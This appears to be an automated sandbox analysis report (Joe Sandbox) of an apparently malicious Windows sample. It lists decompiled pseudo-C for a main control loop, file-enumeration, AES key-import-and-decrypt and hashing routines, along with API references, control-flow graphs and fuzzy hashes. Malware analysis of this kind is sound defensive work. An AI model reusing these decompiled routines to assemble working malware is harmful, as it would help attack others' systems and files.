                          																		__eflags =  *0x6f9abc;
                          																		if( *0x6f9abc == 0) {
                          																			L71:
                          																			__eflags =  *0x6f9b14;
                          																			if( *0x6f9b14 != 0) {
                          																				goto L107;
                          																			}
                          																			__eflags =  *0x6f9ad0;
                          																			if( *0x6f9ad0 != 0) {
                          																				 *0x6f9ad0 = 0;
                          																				_v1104 = 5;
                          																			}
                          																			_t239 = _v1104;
                          																			__eflags = _t239;
                          																			_t138 = 0 | __eflags <= 0x00000000;
                          																			_t237 = _t239 - (0 | __eflags > 0x00000000);
                          																			__eflags = _t237;
                          																			_t55 = _t138 * 8; // 0x1
                          																			_t255 = _t138 + _t55 + 1;
                          																			_v1104 = _t237;
                          																			while(1) {
                          																				Sleep(0x4e20);
                          																				__eflags = _t255 - 2;
                          																				if(_t255 < 2) {
                          																					goto L77;
                          																				}
                          																				_t139 =  *0x6f9ad0; // 0x0
                          																				_t255 = _t255 - 1;
                          																				__eflags = _t139;
                          																				if(_t139 == 0) {
                          																					continue;
                          																				}
                          																				goto L77;
                          																			}
                          																			goto L77;
                          																		}
                          																		_push(1);
                          																		_push( *0x6f9ab4);
                          																		_t140 = E006F4610();
                          																		_t270 = _t270 + 8;
                          																		__eflags = _t140;
                          																		if(_t140 == 0) {
                          																			goto L94;
                          																		}
                          																		_t141 = E006EA180( *0x6f9ab4);
                          																		_t270 = _t270 + 4;
                          																		__eflags = _t141;
                          																		if(_t141 == 0) {
                          																			_t82 =  *0x6f9b14; // 0x0
                          																			_t226 = 0xf;
                          																			__eflags = _t82;
                          																			if(_t82 != 0) {
                          																				_t226 = 4;
                          																			}
                          																			__eflags = _t226 - 0xc;
                          																			if(_t226 == 0xc) {
                          																				goto L94;
                          																			} else {
                          																				__eflags = _t226 - 0xf;
                          																				if(_t226 == 0xf) {
                          																					goto L94;
                          																				}
                          																				__eflags = _t82;
                          																				if(_t82 == 0) {
                          																					goto L94;
                          																				}
                          																				goto L107;
                          																			}
                          																		}
                          																		_t227 =  *0x6f9a94; // 0x2fd120
                          																		__eflags = E006F2F10(_t227);
                          																		if(__eflags != 0) {
                          																			_t229 =  *0x6f9a94; // 0x2fd120
                          																			E006F73C0(_t229, _t142);
                          																			E006E91E0(_t142);
                          																			_t270 = _t270 + 4;
                          																		}
                          																		_t228 =  *0x6f9a94; // 0x2fd120
                          																		_t82 = E006E77E0(_t228, __eflags);
                          																		goto L71;
                          																	}
                          																}
                          																__eflags = _v1120 -  *((intOrPtr*)(_t254 + 0xc)) - 0x3841;
                          																if(_v1120 -  *((intOrPtr*)(_t254 + 0xc)) < 0x3841) {
                          																	goto L57;
                          																}
                          																 *0x6f9bec = _v1120;
                          																_t158 = E006E9060( *0x6f9ab4, 0x6f9ac8);
                          																_t270 = _t270 + 8;
                          																__eflags = _t158;
                          																if(_t158 != 0) {
                          																	_t159 =  *0x6f9ac8; // 0x2fd440
                          																	_t59 = _t159 + 8; // 0x3063a0
                          																	E006F6750( *_t59);
                          																	 *0x6f9b7c = 0;
                          																	goto L94;
                          																}
                          																goto L57;
                          															}
                          															goto L52;
                          														}
                          														L77:
                          														_t254 = _v1084;
                          														_t202 = _t202 + 1;
                          														__eflags = _t202 - 0x64;
                          													} while (_t202 < 0x64);
                          													goto L94;
                          												} else {
                          													_t165 =  *0x6f9bf8; // 0x3
                          													__eflags = _t165;
                          													if(_t165 <= 0) {
                          														E006E2DA0();
                          														_t165 =  *0x6f9bf8; // 0x3
                          													}
                          													__eflags = _v1108;
                          													if(_v1108 != 0) {
                          														__eflags = _t165;
                          														if(_t165 > 0) {
                          															_t230 =  *0x6f9c40; // 0x2f8988
                          															__eflags = _t230;
                          															if(_t230 != 0) {
                          																_push(_t230);
                          																E006E3200();
                          																_t272 = _t272 + 4;
                          																_t165 =  *0x6f9bf8; // 0x3
                          															}
                          														}
                          													}
                          													__eflags = _t165;
                          													if(_t165 < 0) {
                          														L39:
                          														E006E80F0( *0x6f9ab4);
                          														_t272 = _t272 + 4;
                          														goto L40;
                          													} else {
                          														__eflags = (_t165 | 0x00000001) - 3;
                          														if((_t165 | 0x00000001) != 3) {
                          															L40:
                          															_v1108 = _v1120;
                          															goto L41;
                          														}
                          														goto L39;
                          													}
                          												}
                          											}
                          											_push(0x3e8);
                          											goto L93;
                          										}
                          										_t174 = E006E5960(_t301,  *0x6f9ab4,  &_v1060);
                          										_t270 = _t270 + 8;
                          										if(_t174 == 0) {
                          											 *(_t250 + 8) = _v1120;
                          											goto L91;
                          										}
                          										goto L89;
                          										L94:
                          										_t251 =  *0x6f9b7c; // 0x0
                          										_t113 =  *0x6f9ac8; // 0x2fd440
                          										_t252 = _t251 + 1;
                          										 *0x6f9b7c = _t252;
                          										_t66 = _t113 + 0xc; // 0x3063b8
                          										_t114 = E006EC430( *_t66);
                          										_t201 =  &_v532;
                          									} while (_t252 < _t114);
                          									L97:
                          									_t206 =  *0x6f9ab4; // 0x2ef510
                          									_v1100 = 0;
                          									_t249 = E006E1B50(_t206,  &_v1100);
                          									_push( *0x6f9ab4);
                          									_push( *0x6f9aa0);
                          									_t101 = E006EC7C0();
                          									_t270 = _t270 + 8;
                          									_t207 = 1;
                          									if(_t101 == 0) {
                          										L103:
                          										if(_v1112 == 0) {
                          											_t311 = _t207;
                          											if(_t207 != 0) {
                          												_push( *0x6f9ab4);
                          												E006EAB60(_t237, _t311);
                          												_t270 = _t270 + 4;
                          											}
                          										}
                          										continue;
                          									}
                          									_t208 =  *0x6f9ab4; // 0x2ef510
                          									_v1080 = 0;
                          									_t104 = E006E1B50(_t208,  &_v1080);
                          									_t207 = 1;
                          									if(_t104 == 0) {
                          										goto L103;
                          									}
                          									_t209 = _v1100;
                          									if(_v1100 != _v1080) {
                          										L101:
                          										_t105 = E006F7770(_t237,  *0x6f9ab4, 0x6f9ac8);
                          										_t270 = _t270 + 8;
                          										_t207 = 1;
                          										if(_t105 == 3) {
                          											_t106 =  *0x6f9ac8; // 0x2fd440
                          											_t75 = _t106 + 8; // 0x3063a0
                          											E006F6750( *_t75);
                          											_t207 = 0;
                          										}
                          										goto L103;
                          									}
                          									_t108 = E006F7D20(_t249, _t104, _t209);
                          									_t270 = _t270 + 0xc;
                          									_t207 = 1;
                          									if(_t108 != 0) {
                          										goto L103;
                          									}
                          									goto L101;
                          									L96:
                          									_v1112 = 0;
                          									goto L97;
                          								}
                          							}
                          						}
                          					}
                          					if(_t82 > 2) {
                          						goto L107;
                          					} else {
                          						_v1116 = 1;
                          						goto L12;
                          					}
                          				}
                          				_t187 =  *0x6f9cf4(0, E006E58F0); // executed
                          				_t203 =  &_v1100;
                          				 *0x6f9ab8 = _t187;
                          				 *0x6f9bf0 = 1;
                          				_t188 = E006E7340( &_v1100);
                          				 *0x6f9ae8 = E006E3A80();
                          				_v1060 = 0;
                          				_push(0x6f9c40);
                          				_push(0x6f9aa0);
                          				_push(_a4);
                          				E006E3EC0(_t237, _t282);
                          				_t278 = _t266 + 0xc;
                          				SetCurrentDirectoryW( *0x6f9aa0); // executed
                          				if(_t188 != 0) {
                          					_t82 = E006E18E0(_t237, __eflags,  *0x6f9aa0);
                          					goto L107;
                          				}
                          				 *0x6f9ab4 = 0;
                          				E006F2D90();
                          				if(E006E2DA0() == 0) {
                          					L7:
                          					_t194 = E006E3180(0x1c, 0);
                          					_t266 = _t278 + 8;
                          					 *0x6f9b9c = _t194;
                          					 *((intOrPtr*)(_t194 + 0x10)) = 0;
                          					_t195 = GetTickCount();
                          					_t287 =  *0x6f9c04; // 0x0
                          					 *0x6f9ac4 = 0;
                          					 *0x6f9bec = 0;
                          					 *0x6f9c54 = 0;
                          					_v1096 = _t195 + 0x1d4c0;
                          					if(_t287 == 0) {
                          						 *0x6f9c04 = E006F1690();
                          					}
                          					goto L9;
                          				}
                          				_t198 =  *0x6f9c40; // 0x2f8988
                          				if(_t198 == 0) {
                          					goto L7;
                          				}
                          				_push(_t198); // executed
                          				_t82 = E006E3200(); // executed
                          				_t278 = _t278 + 4;
                          				if(_t82 == 0) {
                          					goto L107;
                          				}
                          				goto L7;
                          			}
                          Instruction address column for the decompiled listing above (one address per decompiled line, 0x006f2379 through 0x006f2b96, with 0x00000000 for synthesised lines); the column lost its alignment to the code during extraction and is not reproduced here.

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 006F23A6
                          • GetModuleHandleW.KERNEL32(00000000), ref: 006F23AD
                          • GetLastError.KERNEL32 ref: 006F23B3
                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,006E58F0), ref: 006F23F5
                          • SetCurrentDirectoryW.KERNELBASE ref: 006F2441
                          • GetTickCount.KERNEL32 ref: 006F2496
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,?,?,?,00000001,00000000), ref: 006F25BA
                          • CreateThread.KERNELBASE(00000000,00000000,006F3F50,00000000,?), ref: 006F260E
                          • GetTickCount.KERNEL32 ref: 006F2780
                          • Sleep.KERNEL32(00004E20), ref: 006F2983
                          • Sleep.KERNEL32(000001F4,00000000,?), ref: 006F2A79
                          • CoUninitialize.OLE32 ref: 006F2B8F
                          • ExitProcess.KERNEL32 ref: 006F2B96
                            • Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Sleep$CountErrorLastTick$CreateCurrentDirectoryExceptionExitFreeHandleHandlerHeapModuleProcessThreadUninitializeVectored
                          • String ID:
                          • API String ID: 1891522815-0
                          • Opcode ID: 97b5a4a0d7caab72734cc0016cbd043fe625b784332357eb7cb6194f766dc14b
                          • Instruction ID: 27a01fe040ae2ce9246b5c8f3a3956cfc576b87b38f782083914c89e8fe9c395
                          • Opcode Fuzzy Hash: 97b5a4a0d7caab72734cc0016cbd043fe625b784332357eb7cb6194f766dc14b
                          • Instruction Fuzzy Hash: CB129CB190520A9BDB50EF25EC66B7A37E7BB84308F04142DFA45872A1EB71D904CF66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 376 6ed4b0-6ed4e4 GetFullPathNameW 377 6ed4ea-6ed4f1 PathAddBackslashW 376->377 378 6ed665-6ed670 call 6e91e0 376->378 380 6ed4f6-6ed4ff 377->380 385 6ed672-6ed680 378->385 382 6ed509-6ed516 380->382 383 6ed501-6ed502 380->383 384 6ed51e-6ed527 382->384 383->380 386 6ed504 383->386 387 6ed529-6ed52a 384->387 388 6ed531-6ed536 384->388 389 6ed663 386->389 387->384 390 6ed52c 387->390 391 6ed53a-6ed546 388->391 389->378 390->389 392 6ed54c-6ed558 391->392 393 6ed659 391->393 392->391 394 6ed55a-6ed57e FindFirstFileW 392->394 393->389 394->378 395 6ed584-6ed598 394->395 396 6ed5a0-6ed5a8 395->396 397 6ed5aa-6ed5c7 call 6e3180 396->397 398 6ed622-6ed632 FindNextFileW 396->398 404 6ed5cd-6ed5e1 call 6e3180 397->404 405 6ed681-6ed68a FindClose 397->405 398->396 399 6ed638-6ed655 GetLastError FindClose 398->399 399->385 401 6ed657 399->401 403 6ed691-6ed693 401->403 403->378 407 6ed695-6ed6a2 call 6e91e0 403->407 404->405 411 6ed5e7-6ed61e call 6f4520 call 6f68e0 404->411 405->403 413 6ed6a4 407->413 411->398 413->378
                          C-Code - Quality: 98%
                          			E006ED4B0() {
                          				long _t50;
                          				signed int _t54;
                          				signed int _t55;
                          				void* _t57;
                          				int _t59;
                          				void* _t61;
                          				void _t64;
                          				long _t70;
                          				void _t72;
                          				signed int _t73;
                          				void** _t75;
                          				signed int _t76;
                          				void* _t77;
                          				WCHAR* _t79;
                          				void* _t81;
                          				void* _t82;
                          				signed int _t83;
                          				WCHAR* _t84;
                          				signed int _t85;
                          				void** _t87;
                          				void** _t89;
                          
                          				_t77 = _t87[0x151];
                          				_t84 =  &(_t87[0x34]);
                          				_t50 = GetFullPathNameW(_t87[0x153], 0x105, _t84, 0);
                          				_t81 = 0;
                          				if(_t50 == 0) {
                          					L23:
                          					E006E91E0(_t81);
                          					_t72 = 0;
                          					_t82 = 0;
                          				} else {
                          					PathAddBackslashW(_t84);
                          					_t73 = 0xfffffefb;
                          					while( *((short*)(_t87 + 0x2dc + _t73 * 2)) != 0) {
                          						_t73 = _t73 + 1;
                          						if(_t73 != 0) {
                          							continue;
                          						} else {
                          							L22:
                          							_t81 = 0;
                          							goto L23;
                          						}
                          						goto L24;
                          					}
                          					_t54 = 0xfffffefb;
                          					_t87[2] = 0x2e002a;
                          					_t87[3] = 0x2a;
                          					while( *((short*)(_t87 + 0x2dc + _t54 * 2)) != 0) {
                          						_t54 = _t54 + 1;
                          						if(_t54 != 0) {
                          							continue;
                          						} else {
                          							goto L22;
                          						}
                          						goto L24;
                          					}
                          					_t75 =  &(_t87[2]);
                          					_t55 = _t54 + 1;
                          					_t83 = 0x2a;
                          					while(1) {
                          						_t76 = _t55;
                          						 *(_t87 + 0x2da + _t55 * 2) = _t83;
                          						if(_t55 == 0) {
                          							break;
                          						}
                          						_t83 =  *_t75 & 0x0000ffff;
                          						_t75 =  &(_t75[0]);
                          						_t16 = _t76 + 1; // 0xfffffefd
                          						_t55 = _t16;
                          						if(_t83 != 0) {
                          							continue;
                          						} else {
                          							 *((short*)(_t87 + 0x2dc + _t76 * 2)) = 0;
                          							_t57 = FindFirstFileW(_t84,  &(_t87[0xb7])); // executed
                          							_t81 = 0;
                          							 *_t87 = _t57;
                          							if(_t57 == 0xffffffff) {
                          								goto L23;
                          							} else {
                          								 *((short*)(_t87 + 0x2dc + _t73 * 2)) = 0;
                          								_t82 = 0;
                          								_t87[1] = 0;
                          								do {
                          									if((_t87[0xb7].dwFileAttributes & 0x00000010) != 0) {
                          										goto L18;
                          									} else {
                          										_t79 = _t84;
                          										_t85 = 1;
                          										_t61 = E006E3180(4, _t87[1]);
                          										_t87 =  &(_t87[2]);
                          										_t81 = _t61;
                          										if(_t61 == 0) {
                          											L25:
                          											FindClose( *_t87);
                          											_t77 = _t87[0x151];
                          											L26:
                          											if(_t85 != 0) {
                          												do {
                          													E006E91E0( *((intOrPtr*)(_t81 + _t85 * 4 - 4)));
                          													_t87 =  &(_t87[1]);
                          													_t85 = _t85 - 1;
                          												} while (_t85 != 0);
                          											}
                          											goto L23;
                          											L29:
                          										} else {
                          											_t64 = E006E3180(0x208, 0);
                          											_t87 =  &(_t87[2]);
                          											 *_t81 = _t64;
                          											if(_t64 == 0) {
                          												goto L25;
                          											} else {
                          												E006F4520( &(_t87[3]), 0x23);
                          												_t89 =  &(_t87[2]);
                          												_push( &(_t89[0xc2]));
                          												E006F68E0( *_t81, 0x105,  &(_t89[4]), _t79);
                          												_t87 =  &(_t89[5]);
                          												_t72 = _t85;
                          												_t84 = _t79;
                          												_t87[1] = _t81;
                          												goto L18;
                          											}
                          										}
                          									}
                          									goto L24;
                          									L18:
                          									_t59 = FindNextFileW(_t87[1],  &(_t87[0xb7])); // executed
                          								} while (_t59 != 0);
                          								_t70 = GetLastError();
                          								FindClose( *_t87);
                          								_t77 = _t87[0x151];
                          								_t85 = _t72;
                          								if(_t70 != 0x12) {
                          									goto L26;
                          								}
                          							}
                          						}
                          						goto L24;
                          					}
                          					 *((short*)(_t87 + 0x2da + _t76 * 2)) = 0;
                          					goto L22;
                          				}
                          				L24:
                          				 *_t77 = _t72;
                          				return _t82;
                          				goto L29;
                          			}
                          0x006ed4ba
                          0x006ed4c1
                          0x006ed4d7
                          0x006ed4df
                          0x006ed4e4
                          0x006ed665
                          0x006ed666
                          0x006ed66e
                          0x006ed670
                          0x006ed4ea
                          0x006ed4eb
                          0x006ed4f1
                          0x006ed4f6
                          0x006ed501
                          0x006ed502
                          0x00000000
                          0x006ed504
                          0x006ed663
                          0x006ed663
                          0x00000000
                          0x006ed663
                          0x00000000
                          0x006ed502
                          0x006ed509
                          0x006ed50e
                          0x006ed516
                          0x006ed51e
                          0x006ed529
                          0x006ed52a
                          0x00000000
                          0x006ed52c
                          0x00000000
                          0x006ed52c
                          0x00000000
                          0x006ed52a
                          0x006ed531
                          0x006ed535
                          0x006ed536
                          0x006ed53a
                          0x006ed53a
                          0x006ed53e
                          0x006ed546
                          0x00000000
                          0x00000000
                          0x006ed54c
                          0x006ed54f
                          0x006ed552
                          0x006ed552
                          0x006ed558
                          0x00000000
                          0x006ed55a
                          0x006ed561
                          0x006ed56d
                          0x006ed576
                          0x006ed57b
                          0x006ed57e
                          0x00000000
                          0x006ed584
                          0x006ed58a
                          0x006ed596
                          0x006ed598
                          0x006ed5a0
                          0x006ed5a8
                          0x00000000
                          0x006ed5aa
                          0x006ed5aa
                          0x006ed5ac
                          0x006ed5bb
                          0x006ed5c0
                          0x006ed5c3
                          0x006ed5c7
                          0x006ed681
                          0x006ed684
                          0x006ed68a
                          0x006ed691
                          0x006ed693
                          0x006ed695
                          0x006ed699
                          0x006ed69e
                          0x006ed6a1
                          0x006ed6a1
                          0x006ed6a4
                          0x00000000
                          0x00000000
                          0x006ed5cd
                          0x006ed5d4
                          0x006ed5d9
                          0x006ed5de
                          0x006ed5e1
                          0x00000000
                          0x006ed5e7
                          0x006ed5ee
                          0x006ed5f3
                          0x006ed5fd
                          0x006ed60c
                          0x006ed611
                          0x006ed614
                          0x006ed616
                          0x006ed61e
                          0x00000000
                          0x006ed61e
                          0x006ed5e1
                          0x006ed5c7
                          0x00000000
                          0x006ed622
                          0x006ed62e
                          0x006ed630
                          0x006ed638
                          0x006ed643
                          0x006ed649
                          0x006ed653
                          0x006ed655
                          0x00000000
                          0x006ed657
                          0x006ed655
                          0x006ed57e
                          0x00000000
                          0x006ed558
                          0x006ed659
                          0x00000000
                          0x006ed659
                          0x006ed672
                          0x006ed672
                          0x006ed680
                          0x00000000

                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 006ED4D7
                          • PathAddBackslashW.SHLWAPI(?), ref: 006ED4EB
                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 006ED56D
                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006ED62E
                          • GetLastError.KERNEL32 ref: 006ED638
                          • FindClose.KERNEL32 ref: 006ED643
                          • FindClose.KERNEL32 ref: 006ED684
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Find$CloseFilePath$BackslashErrorFirstFullLastNameNext
                          • String ID: *$*
                          • API String ID: 1945327101-3771216468
                          • Opcode ID: d2d662a0cda4d63c8aef6d81547dedb5bc9dffaaba5cce223c129321c0385b70
                          • Instruction ID: 340f29f46b9f3238117469f7355e5fe3584761f87fefaf29f968a674cda0c236
                          • Opcode Fuzzy Hash: d2d662a0cda4d63c8aef6d81547dedb5bc9dffaaba5cce223c129321c0385b70
                          • Instruction Fuzzy Hash: BF41F3725053859BD330AF65EC48BEBB7EAEF84308F24442DE889972A1E7719D14CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 464 6f5ab0-6f5ad8 CryptAcquireContextW 465 6f5ade-6f5b21 call 6ec400 CryptImportKey 464->465 466 6f5ba0 464->466 474 6f5b9a 465->474 475 6f5b23-6f5b3e CryptSetKeyParam 465->475 467 6f5ba2-6f5ba7 466->467 469 6f5ba9-6f5baa CryptDestroyKey 467->469 470 6f5bb0-6f5bbe 467->470 469->470 472 6f5bc9-6f5bdb 470->472 473 6f5bc0-6f5bc3 CryptReleaseContext 470->473 473->472 476 6f5b9c-6f5b9e 474->476 475->474 477 6f5b40-6f5b54 CryptSetKeyParam 475->477 476->467 477->474 478 6f5b56-6f5b67 call 6e3180 477->478 478->474 481 6f5b69-6f5b93 call 6ec400 CryptDecrypt 478->481 484 6f5bde-6f5be7 call 6e91e0 481->484 485 6f5b95-6f5b98 481->485 484->476 485->467
                          C-Code - Quality: 48%
                          			E006F5AB0(intOrPtr* _a4) {
                          				BYTE* _v0;
                          				intOrPtr _v8;
                          				intOrPtr _v40;
                          				int _v64;
                          				char _v68;
                          				long* _v72;
                          				char _v80;
                          				long* _v88;
                          				intOrPtr _v92;
                          				char _v104;
                          				intOrPtr _v116;
                          				intOrPtr _v132;
                          				char _v144;
                          				long* _v148;
                          				intOrPtr* _t22;
                          				void* _t23;
                          				long* _t24;
                          				long* _t25;
                          				int* _t34;
                          				BYTE* _t37;
                          				DWORD* _t39;
                          				intOrPtr* _t42;
                          				char* _t43;
                          				long* _t46;
                          				int _t47;
                          				BYTE* _t49;
                          				HCRYPTKEY* _t51;
                          
                          				_t49 = 0;
                          				_t22 =  &_v68;
                          				 *_t22 = 0;
                          				 *_t51 = 0;
                          				_v72 = 0;
                          				_t23 =  *0x6f9e08(_t22, 0, 0, 0x18, 0xf0000000); // executed
                          				if(_t23 == 0) {
                          					_t46 = 0;
                          				} else {
                          					_t43 =  &_v68;
                          					 *((intOrPtr*)(_t43 - 0xc)) = 0x208;
                          					 *((intOrPtr*)(_t43 - 8)) = 0x6610;
                          					 *((intOrPtr*)(_t43 - 4)) = 0x20;
                          					E006EC400(_t43, _v8, 0x20);
                          					_t51 =  &(_t51[3]);
                          					if(CryptImportKey(_v88,  &_v80, 0x2c, 0, 1, _t51) == 0) {
                          						L7:
                          						_t46 = 0;
                          						goto L8;
                          					} else {
                          						_t34 =  &_v104;
                          						 *_t34 = 1;
                          						_push(0);
                          						_push(_t34);
                          						_push(4);
                          						_push(_v116);
                          						if( *0x6f9e10() == 0) {
                          							goto L7;
                          						} else {
                          							_push(0);
                          							_push(_v40);
                          							_push(1);
                          							_push(_v132);
                          							if( *0x6f9e10() == 0) {
                          								goto L7;
                          							} else {
                          								_t47 = _v64;
                          								_t37 = E006E3180(_t47, 0);
                          								_t51 =  &(_t51[2]);
                          								if(_t37 == 0) {
                          									goto L7;
                          								} else {
                          									_t49 = _t37;
                          									E006EC400(_t37, _v68, _t47);
                          									_t51 =  &(_t51[3]);
                          									_t39 =  &_v144;
                          									 *_t39 = _t47;
                          									_t46 = 0;
                          									if(CryptDecrypt(_v148, 0, 1, 0, _t49, _t39) == 0) {
                          										E006E91E0(_t49);
                          										_t51 =  &(_t51[1]);
                          										L8:
                          										_t49 = 0;
                          									} else {
                          										_t46 = 1;
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				_t24 =  *_t51;
                          				if(_t24 != 0) {
                          					CryptDestroyKey(_t24);
                          				}
                          				_t25 = _v88;
                          				_t42 = _a4;
                          				if(_t25 != 0) {
                          					CryptReleaseContext(_t25, 0);
                          				}
                          				_v0 = _t49;
                          				 *_t42 = _v92;
                          				return _t46;
                          			}
                          0x006f5ab7
                          0x006f5ab9
                          0x006f5abd
                          0x006f5abf
                          0x006f5ac2
                          0x006f5ad0
                          0x006f5ad8
                          0x006f5ba0
                          0x006f5ade
                          0x006f5ae2
                          0x006f5aeb
                          0x006f5af2
                          0x006f5af9
                          0x006f5aff
                          0x006f5b04
                          0x006f5b21
                          0x006f5b9a
                          0x006f5b9a
                          0x00000000
                          0x006f5b23
                          0x006f5b23
                          0x006f5b27
                          0x006f5b2d
                          0x006f5b2f
                          0x006f5b30
                          0x006f5b32
                          0x006f5b3e
                          0x00000000
                          0x006f5b40
                          0x006f5b40
                          0x006f5b42
                          0x006f5b46
                          0x006f5b48
                          0x006f5b54
                          0x00000000
                          0x006f5b56
                          0x006f5b56
                          0x006f5b5d
                          0x006f5b62
                          0x006f5b67
                          0x00000000
                          0x006f5b69
                          0x006f5b69
                          0x006f5b71
                          0x006f5b76
                          0x006f5b79
                          0x006f5b7d
                          0x006f5b7f
                          0x006f5b93
                          0x006f5bdf
                          0x006f5be4
                          0x006f5b9c
                          0x006f5b9c
                          0x006f5b95
                          0x006f5b97
                          0x006f5b97
                          0x006f5b93
                          0x006f5b67
                          0x006f5b54
                          0x006f5b3e
                          0x006f5b21
                          0x006f5ba2
                          0x006f5ba7
                          0x006f5baa
                          0x006f5baa
                          0x006f5bb0
                          0x006f5bb4
                          0x006f5bbe
                          0x006f5bc3
                          0x006f5bc3
                          0x006f5bc9
                          0x006f5bd0
                          0x006f5bdb

                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,006F48B5,?,?,00000020,?,?,?,?,00000020), ref: 006F5AD0
                          • CryptImportKey.ADVAPI32(?,?,0000002C,00000000,00000001), ref: 006F5B19
                          • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 006F5B36
                          • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 006F5B4C
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 006F5B8B
                          • CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000,00000002), ref: 006F5BAA
                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000), ref: 006F5BC3
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Crypt$ContextHeapParam$AcquireAllocateDecryptDestroyImportProcessRelease
                          • String ID:
                          • API String ID: 2876648536-0
                          • Opcode ID: 5a6077dad3714ab69b0375cfb2208d7ba68576952f800f9e06c4afb71034a708
                          • Instruction ID: 24b62bbbcebc9d4350f68c30a3ff29f34a67b4b66052bbdc5b4d8fcbfb875e8d
                          • Opcode Fuzzy Hash: 5a6077dad3714ab69b0375cfb2208d7ba68576952f800f9e06c4afb71034a708
                          • Instruction Fuzzy Hash: A1315C71204304ABE7209F22DC49F7BBBAAEF85B10F14441CBA4596290D7B1DC05DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 488 6ef800-6ef82c CryptAcquireContextW 489 6ef832-6ef849 CryptCreateHash 488->489 490 6ef8c1 488->490 489->490 492 6ef84b-6ef861 CryptHashData 489->492 491 6ef8c3-6ef8c8 490->491 493 6ef8ca-6ef8cb CryptDestroyHash 491->493 494 6ef8d1-6ef8df 491->494 495 6ef8b2-6ef8b6 492->495 496 6ef863-6ef883 CryptGetHashParam 492->496 493->494 498 6ef8ea-6ef8fc 494->498 499 6ef8e1-6ef8e4 CryptReleaseContext 494->499 495->491 496->495 497 6ef885-6ef895 call 6e3180 496->497 497->495 502 6ef897-6ef8ab CryptGetHashParam 497->502 499->498 503 6ef8ad-6ef8b0 502->503 504 6ef8b8-6ef8be call 6e91e0 502->504 503->491 504->490
                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000020,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 006EF824
                          • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 006EF841
                          • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?,?), ref: 006EF859
                          • CryptGetHashParam.ADVAPI32(00000004,00000004,?,?,00000000,?,?,?,0000800C,?,?,?,?,?,00000020,?), ref: 006EF87B
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • CryptGetHashParam.ADVAPI32(00000002,00000002,00000000,?,00000000,?,?,?,?,?,0000800C), ref: 006EF8A3
                          • CryptDestroyHash.ADVAPI32(00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?,00000002), ref: 006EF8CB
                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0000800C,?,?,?,?,?,00000020,?,?,?,?,?), ref: 006EF8E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
